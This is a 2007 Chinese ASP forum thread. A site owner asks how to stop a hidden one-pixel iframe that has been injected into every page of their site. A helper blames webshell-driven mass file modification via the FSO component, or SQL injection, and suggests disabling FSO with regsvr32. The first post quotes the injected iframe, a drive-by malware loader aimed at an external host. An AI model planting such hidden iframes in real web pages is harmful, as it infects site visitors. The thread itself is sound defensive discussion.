搜索
编程论坛WEB开发『 ASP技术论坛 』 → [求助]如何防止别人放这样的代码
标题:[求助]如何防止别人放这样的代码
只看楼主
mai_25
Rank: 3Rank: 3
来 自:上海
等 级:论坛游侠
帖 子:206
专家分:131
注 册:2006-7-22
结帖率:65.22%
楼主
 问题点数:0 回复次数:6 
[求助]如何防止别人放这样的代码
<iframe src=http://aa. widtH=1 naMe='1399' height=1></iframe>
搜索更多相关主题的帖子: 代码 
2007-11-17 09:59
hmhz
Rank: 7Rank: 7Rank: 7
等 级:贵宾
威 望:30
帖 子:1890
专家分:503
注 册:2006-12-17
2
得分:0 

放这样的代码有两种方式,一种在你的文件上添加这段代码
另一种是直接插入到你的数据库在网站被调用

前一种很容防止,直接把服务器FSO组件禁止就行了
后一种要防的话,给网站加防注入代码,只要程序无漏洞就行了


[编程论坛] ASP超级群:49158383  敲门暗号:ASP编程
龍艺博客 http://www.
2007-11-17 10:04
mai_25
Rank: 3Rank: 3
来 自:上海
等 级:论坛游侠
帖 子:206
专家分:131
注 册:2006-7-22
3
得分:0 
这个代码是整个网站都有。不管是静态还是动态页面全部都有,也只有这两种情况吗?

[此贴子已经被作者于2007-11-17 10:19:25编辑过]



http://www.,就算跌倒也要豪迈的笑。
2007-11-17 10:18
hmhz
Rank: 7Rank: 7Rank: 7
等 级:贵宾
威 望:30
帖 子:1890
专家分:503
注 册:2006-12-17
4
得分:0 

你的情况应该属于第一种,服务器支持FSO 被人传马上去,批量挂马的
批量挂马,就是利用FSO组件对所有文件进行修改,无论你是静态文件还是asp程序类文件,都可以修改挂马

还有个可能,服务器中毒,感染上的


[编程论坛] ASP超级群:49158383  敲门暗号:ASP编程
龍艺博客 http://www.
2007-11-17 11:15
mai_25
Rank: 3Rank: 3
来 自:上海
等 级:论坛游侠
帖 子:206
专家分:131
注 册:2006-7-22
5
得分:0 
那如何禁止服务器FSO组件

http://www.,就算跌倒也要豪迈的笑。
2007-11-17 13:28
hmhz
Rank: 7Rank: 7Rank: 7
等 级:贵宾
威 望:30
帖 子:1890
专家分:503
注 册:2006-12-17
6
得分:0 
是你自己的服务器吗?

如果是自己的服务器,那么在运行里输入 regsvr32 /u scrrun.dll

就可以关闭FSO组件了

[编程论坛] ASP超级群:49158383  敲门暗号:ASP编程
龍艺博客 http://www.
2007-11-17 14:10
mai_25
Rank: 3Rank: 3
来 自:上海
等 级:论坛游侠
帖 子:206
专家分:131
注 册:2006-7-22
7
得分:0 
是的,刚买没多久,谢谢

[此贴子已经被作者于2007-11-17 14:47:00编辑过]



http://www.,就算跌倒也要豪迈的笑。
2007-11-17 14:46



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-186645-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 1.600402 second(s), 7 queries.
Copyright©2004-2025, BCCN.NET, All Rights Reserved